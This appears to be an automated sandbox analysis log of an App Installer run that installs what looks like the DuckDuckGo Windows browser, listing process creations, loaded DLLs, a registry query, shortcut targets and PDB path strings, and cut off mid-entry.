Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: vccorlib140_app.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: msvcp140_app.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: concrt140_app.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: vcruntime140_app.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: vcruntime140_app.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: msvcp140_app.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: vcruntime140_app.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.ui.xaml.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.storage.applicationdata.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: wldp.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: propsys.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: rometadata.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.staterepositorycore.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: netutils.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: mrmcorer.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.staterepositoryclient.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: profapi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: bcp47mrm.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.globalization.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: uiamanager.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.ui.core.textinput.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.ui.immersive.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: biwinrt.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.applicationmodel.background.systemeventsbroker.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.applicationmodel.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.ui.xaml.controls.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: twinapi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: directmanipulation.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: userenv.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: profext.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: windows.web.http.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: wininet.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: schannel.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: certenroll.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: certca.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: dsparse.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: mlang.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: appxpackaging.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: cryptowinrt.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: cryptxml.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeSection loaded: webservices.dllJump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Binary string: WindowsBrowser/WindowsBrowser.Privacy.pdbmWindowsBrowser/DbgX.Interfaces.Internal.dllWindowsBrowser/DbgX.Interfaces.dll.com source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.WINDOWS.PDB/WindowsBrowser/DuckDuckGo.Windows.pdb/WINDOWSBROWSER/DUCKDUCKGO.WEBVIEW.PDB/WindowsBrowser/DuckDuckGo.Updater.dll source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.Privacy.pdb0 source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.WEBVIEW.WEBVIEW2.PDB0K source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: S.PDB source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: uckGo.pdb source: AppInstaller.exe, 00000008.00000002.3034286415.0000019EC9823000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.UserPreferences.pdb/WindowsBrowser/DuckDuckGo.Updater.runtimeconfig.json/WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.dllON/WindowsBrowser/Microsoft.ApplicationInsights.dllON source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.pdb source: AppInstaller.exe, 00000008.00000002.3034286415.0000019EC9823000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Common.Wpf.pdbWindowsBrowser/DuckDuckGo.CrashReporter.pdbdbWindowsBrowser/WindowsBrowser.CrashHandler.pdbWindowsBrowser/WindowsBrowser.Bookmarks.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.STYLES.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.DataBrokerProtection.Shared.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WebView2/telclient.dll/WindowsBrowser/WebView2/telclient.dll/WindowsBrowser/WebView2/onramp.dllLL/WindowsBrowser/WebView2/onramp.dllll/WindowsBrowser/WebView2/oneds.dllDLLWindowsBrowser/DuckDuckGo.PersonalInfoRemoval.runtimeconfig.jsonLES.PDB/WINDOWSBROWSER/WEBVIEW2/ONRAMP.DLLLL/WindowsBrowser/WebView2/vulkan-1.dll/WINDOWSBROWSER/WEBVIEW2/MOJO_CORE.DLL/WINDOWSBROWSER/WEBVIEW2/ONEDS.DLL/WINDOWSBROWSER/WEBVIEW2/ONEDS.DLL/WindowsBrowser/WebView2/ffmpeg.dll/WindowsBrowser/WebView2/msedge.dllL/WINDOWSBROWSER/WEBVIEW2/ONRAMP.DLL/WindowsBrowser/WebView2/msedge.dlll source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.NetworkProtection.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.BURNING.PDB/WindowsBrowser/WindowsBrowser.Burning.pdbPF source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.DataBrokerProtection.pdb source: AppInstaller.exe, 00000008.00000002.3035019047.0000019EC9992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdbed.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Privacy.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Common.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: e.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.CrashReporter.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.VPN.Tray.deps.jsonWindowsBrowser/WindowsBrowser.Privacy.pdbonWindowsBrowser/DuckDuckGo.VPN.Tray.deps.json source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: x/WindowsBrowser/fr/System.Private.ServiceModel.resources.dll|/WindowsBrowser/tr/Microsoft.CodeAnalysis.CSharp.resources.dllx/WindowsBrowser/ru/System.Windows.Forms.Design.resources.dll.pdb source: AppInstaller.exe, 00000008.00000002.3031274677.0000019EC92F1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.PDB/WindowsBrowser/DuckDuckGo.pdb source: AppInstaller.exe, 00000008.00000002.3034989049.0000019EC9981000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: w.pdb source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ER.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.NETWORKPROTECTION.PDB/WINDOWSBROWSER/WINDOWSBROWSER.SECURESTORAGE.PDB/WindowsBrowser/WindowsBrowser.SecureStorage.pdb/WindowsBrowser/WindowsBrowser.NetworkProtection.pdbon/WindowsBrowser/WindowsBrowser.UserPreferences.pdbBb/WindowsBrowser/DuckDuckGo.VPN.Tray.runtimeconfig.json/WINDOWSBROWSER/WINDOWSBROWSER.NETWORKPROTECTION.PDB/WindowsBrowser/DuckDuckGo.Updater.runtimeconfig.json source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Common.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 